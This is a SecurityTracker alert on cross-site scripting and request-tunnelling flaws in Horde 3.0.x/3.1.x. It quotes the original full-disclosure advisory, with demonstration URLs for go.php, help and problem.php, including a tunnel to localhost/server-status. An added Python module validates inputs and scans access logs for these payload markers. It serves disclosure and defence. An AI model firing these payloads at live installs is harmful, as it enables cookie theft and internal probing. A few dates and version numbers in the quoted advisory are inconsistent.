SecurityTracker.com
Category: Application (Generic) > Horde Application Framework
Vendors: Horde Project
Horde Application Framework Input Validation Hole Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1016442
SecurityTracker URL:  http://securitytracker.com/id?1016442
CVE Reference: CVE-2006-3548, CVE-2006-3549
Updated:  Aug 7 2008
Original Entry Date:  Jul 6 2006
Impact:  Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
Version(s): 3.0.0 - 3.0.10, 3.1.0, 3.1.1
Description:  A vulnerability was reported in Horde Application Framework. A remote user can conduct cross-site scripting attacks.

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Horde Application Framework software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The URL redirection (dereferrer) function is affected. A demonstration exploit URL is provided:

[Base_URI]/services/go.php?url=http://./;URL=javascript:alert(0);

The help function is affected. A demonstration exploit URL is provided:

[Base_URI]/services/help/?show=about&module=%3Cmeta%20http-equiv=%22refresh%22%20content=%220;URL=javascript:alert(0)%3B%22%3E

The problem reporting function is affected. A demonstration exploit URL is provided:

[Base_URI]/services/problem.php?name=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%20x=%22


A remote user can tunnel HTTP GET requests through the application and inject arbitrary HTML code into the output generated by the application. Some demonstration exploit URLs are provided:

[Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/

[Base_URI]/horde/services/go.php?untrusted=1&url=http://localhost/server-status

[Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/logger/xss.html

The vendor was notified on June 6, 2006.

Moritz Naumann IT Consulting & Services reported this vulnerability.

The original advisory is available at:

http://moritz-naumann.com/adv/0011/hordemulti/0011.txt
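The four issues above come down to two controls on the server: the `url` parameter of go.php has to be treated as a URL to validate (and, on the server-side fetch path, as a host to authorise) rather than a string to echo, and the `module` and `name` parameters of the help and problem pages have to be looked up or attribute-encoded before they reach the page. The Python module below is an added example, not Horde's code and not a reproduction of the vendor's fix; the function names, the tunnel allowlist, the module registry and the log lines are constructed for illustration. The last function turns the same markers into a detection check over web-server access-log lines, so an operator can see whether the demonstration requests above were ever made against an unpatched install.

```python
"""Defensive controls and a log check for the go.php, help and problem.php
issues discussed above.  Added example, not Horde's own code; every name,
the allowlist, the module registry and the log lines are constructed."""
import html
import ipaddress
import re
from urllib.parse import urlsplit, unquote_plus

# Assumed policy: hosts the server-side dereferrer (untrusted=1) may fetch.
TUNNEL_ALLOWLIST = {"www.horde.org"}
# Assumed registry of installed Horde applications known to the help system.
KNOWN_MODULES = {"horde", "imp", "turba", "kronolith"}

_HOSTNAME = re.compile(
    r"[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)*")


def is_safe_redirect_target(url):
    """Issue 1: a redirect target must be an absolute http(s) URL with a real
    host.  'javascript:' fails on scheme; 'http://./;URL=javascript:alert(0);'
    fails because its host part is the bare '.'."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return False
    if parts.scheme.lower() not in ("http", "https"):
        return False
    return _HOSTNAME.fullmatch(parts.hostname or "") is not None


def is_safe_tunnel_target(url):
    """Issue 4: a server-side fetch is stricter.  Loopback, private and
    link-local literals and 'localhost' are refused so the web server cannot
    be used as a proxy to its own interfaces, and the host must be allowlisted."""
    if not is_safe_redirect_target(url):
        return False
    host = urlsplit(url.strip()).hostname
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None and (ip.is_loopback or ip.is_private or ip.is_link_local):
        return False
    if host == "localhost" or host.endswith(".localhost"):
        return False
    return host in TUNNEL_ALLOWLIST


def is_known_module(module):
    """Issue 2: 'module' names an installed application, so it is validated
    as an identifier and looked up, never echoed as markup."""
    return re.fullmatch(r"[a-z][a-z0-9_]*", module) is not None and module in KNOWN_MODULES


def render_problem_field(name):
    """Issue 3: 'name' is reflected into an attribute value, so it is
    attribute-encoded; the closing '">' of the payload becomes '&quot;&gt;'."""
    return '<input type="text" name="name" value="%s">' % html.escape(name, quote=True)


# Markers of the four demonstrations once the query string is URL-decoded.
_SUSPECT = re.compile(r"javascript:|<script|<meta|url=https?://(?:localhost|127\.)", re.I)
_AFFECTED = re.compile(r"/services/(?:go\.php|help/|problem\.php)$")


def scan_access_log(lines):
    """Detection: flag GET requests to the three affected endpoints whose
    decoded query string carries script or meta-refresh markup or points the
    dereferrer at the loopback interface.  Returns (line_no, path, marker)."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'"GET (\S+) HTTP/', line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        if not _AFFECTED.search(path):
            continue
        s = _SUSPECT.search(unquote_plus(query))
        if s:
            hits.append((n, path, s.group(0).lower()))
    return hits


# Constructed Apache-style access-log lines: the four demonstration request
# URIs from the advisory plus two ordinary requests that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jul/2006:23:43:30 +0200] "GET /horde/services/go.php?url=http://www.horde.org/ HTTP/1.1" 302 0',
    '10.0.0.5 - - [05/Jul/2006:23:44:01 +0200] "GET /horde/services/go.php?url=http://./;URL=javascript:alert(0); HTTP/1.1" 200 512',
    '10.0.0.5 - - [05/Jul/2006:23:44:10 +0200] "GET /horde/services/help/?show=about&module=%3Cmeta%20http-equiv=%22refresh%22%20content=%220;URL=javascript:alert(0)%3B%22%3E HTTP/1.1" 200 2048',
    '10.0.0.5 - - [05/Jul/2006:23:44:20 +0200] "GET /horde/services/problem.php?name=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%20x=%22 HTTP/1.1" 200 1900',
    '10.0.0.5 - - [05/Jul/2006:23:44:30 +0200] "GET /horde/services/go.php?untrusted=1&url=http://localhost/server-status HTTP/1.1" 200 3000',
    '10.0.0.5 - - [05/Jul/2006:23:45:00 +0200] "GET /horde/imp/login.php HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

Running the module as a script lists lines 2 to 5 of the constructed log with the marker that tripped each one. The validators deliberately reject by construction rather than by blocklisting the demonstration strings: a scheme allowlist, a hostname grammar and an address-class check cover the `url` cases, and a lookup against the registry covers `module`, so encoding variants of the same payloads fail the same way.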

Impact:  A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Horde Application Framework software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:  The vendor has issued fixed versions (3.0.11, 3.1.2).

The vendor's release announcements are available at:

http://lists.horde.org/archives/announce/2006/000287.html
http://lists.horde.org/archives/announce/2006/000288.html

Vendor URL: www.horde.org/horde/
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  security@moritz-naumann.com
Message History:   None.


 Source Message Contents

Date:  Wed, 05 Jul 2006 23:43:30 +0200
From:  security@moritz-naumann.com
Subject:  [Full-disclosure] Public Advisory: Horde 3.1.1,


 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



SA0011

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++        Horde 3.1.1, 3.0.10 Multiple Security Issues         +++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


PUBLISHED ON
  July 05, 2006


PUBLISHED AT
  http://moritz-naumann.com/adv/0011/hordemulti/0011.txt
  http://moritz-naumann.com/adv/0011/hordemulti/0011.txt.gpg


PUBLISHED BY
  Moritz Naumann IT Consulting & Services
  Hamburg, Germany
  http://moritz-naumann.com/

  SECURITY at MORITZ hyphon NAUMANN d0t COM
  GPG key: http://moritz-naumann.com/keys/0x277F060C.asc


AFFECTED APPLICATION OR SERVICE
  Horde Application Framework
  http://www.horde.org

  The Horde Framework is a common code-base used by Horde
  applications, including libraries and a common user interface.
  The best known Horde application to date is probably IMP, a webbased
  IMAP/SMTP client.


AFFECTED VERSIONS
  Version 3.0.0 up to and including 3.0.10
  Version 3.1.0 up to and including 3.1.1
  Versions below 3.0.0 have not been examined.


ISSUES
  Horde is subject to multiple security vulnerabilities, ranging from
  information disclosure to client side script injection (cross site
  scripting) issues.

  +++++ 1. Cross Site Scripting #1
  Horde is subject to a client side script injection vulnerability in
  the URL redirection (dereferrer) function.

  By accessing the following (partial) URI on a web site running an
  affected version with a web browser which is prone to this issue,
  client side script code will be injected into the output generated
  by the application:

  [Base_URI]/services/go.php?url=http://./;URL=javascript:alert(0);

  This problem is caused by insufficient validation of user supplied
  input. It is only known to be exploitable on Internet Explorer 6
  (tested on v6.2900.2180 including all patches on Windows XP SP2).
  Internet Explorer 7 beta 3 is not affected.

  +++++ 2. Cross Site Scripting #2
  Horde is subject to a client side script injection vulnerability in
  the help function.

  By accessing the following (partial) URI on a web site running a
  vulnerable version with a web browser which is prone to this issue,
  client side script code will be injected into the output generated
  by the application:


  [Base_URI]/services/help/?show=about&module=%3Cmeta%20http-equiv=%22refresh%22%20content=%220;URL=javascript:alert(0)%3B%22%3E

  This problem is caused by insufficient validation of user supplied
  input. All common modern browsers providing Javascript support are
  assumed to be prone to this issue.

  +++++ 3. Cross Site Scripting #3
  Horde is subject to a client side script injection vulnerability in
  the problem reporting function.

  By accessing the following (partial) URI on a web site running a
  vulnerable version with a web browser which is prone to this issue,
  client side script code will be injected into the output generated
  by the application:

  [Base_URI]/services/problem.php?name=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%20x=%22

  This problem is caused by insufficient validation of user supplied
  input. All common modern browsers providing Javascript support are
  assumed to be prone to this issue.

  +++++ 4. Cross Site Scripting #4, Web tunneling behaviour
  Horde is subject to a server side issue which allows to tunnel HTTP
  GET requests through the application and to inject remotely hosted
  web script into the output generated by the application.

  This behaviour allows for accessing arbitrary locations which are
  addressable using URIs starting with 'http://', 'https://' or 'ftp://'
  protocol handlers. These locations will be accessible from within the
  security context of the web server running an affected version of the
  application. As a result, an attacker may be able to access remote
  locations s/he would not have otherwise access to, without disclosing
  the real source of the request [1]. Additionally, insufficiently
  access restricted local (server-side) or remote (3rd party) locations
  may become available [2].

  By tricking a victim into starting a tunnelling call to a previously
  prepared malicious HTML file, stored in a remote location, which
  contains web script which may be executed on the client side, it is
  possible to extend this into a script injection issue. The injected
  script would be executed by the client within the context of the
  domain the vulnerable web application is hosted in. [3]

  All common modern browsers providing Javascript support are assumed
  to be prone to this issue.

  By accessing the following (partial) URIs on a web site running a
  vulnerable version with a web browser, the behaviours described above
  may be triggered:

  [1] [Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/
  [2] [Base_URI]/horde/services/go.php?untrusted=1&url=http://localhost/server-status
  [3] [Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/logger/xss.html


BACKGROUND
  Cross Site Scripting (XSS):
  Cross Site Scripting, also known as XSS or CSS, describes the
  injection of malicious content into output produced by a web
  application. A common attack vector is the inclusion of arbitrary
  client side script code into the applications' output. Failure to
  completely sanitize user input from malicious content can cause a
  web application to be vulnerable to Cross Site Scripting.
  http://www.owasp.org/index.php/Cross_Site_Scripting
  http://en.wikipedia.org/wiki/XSS
  http://www.cgisecurity.net/articles/xss-faq.shtml


WORKAROUNDS
  Issues 1-3:
    Client: Disable Javascript.
    Server: Prevent access to vulnerable file(s).
  Issues 1-3:
    Client: Use application as intended only.
    Server: Prevent access to vulnerable file(s).


SOLUTIONS
  The Horde project has released versions 3.1.2 and 3.1.11 today.
  These are supposed to fix all of the above issues. The updated
  packages are available at http://horde.org/


TIMELINE
  Jun 06, 2006  Issues 1-4: Discovery, code maintainer notification
  Jun 06, 2006  Issues 1-4: Code maintainer acknowledgement
  Jul 05, 2006  Issues 1-4: Code maintainer provides fix publicly
  Jul 05, 2005  Issues 1-4: Public advisory


NOTES
  This is not related to CVE-2006-2195.


REFERENCES
  Developers' release announcements
  v3.1.2:  http://lists.horde.org/archives/announce/2006/000288.html
  v3.0.11: http://lists.horde.org/archives/announce/2006/000287.html


ADDITIONAL CREDIT
  N/A


LICENSE
  Creative Commons Attribution-ShareAlike License Germany
  http://creativecommons.org/licenses/by-sa/2.0/de/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFErDKBn6GkvSd/BgwRAlF7AJ4kjEsFBc2LXp4TgtxQ82OyUK4nBACfZy/U
31jDwhWrNKdtHXmsdcM1bAk=
=ENdh
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Copyright 2007, SecurityGlobal.net LLC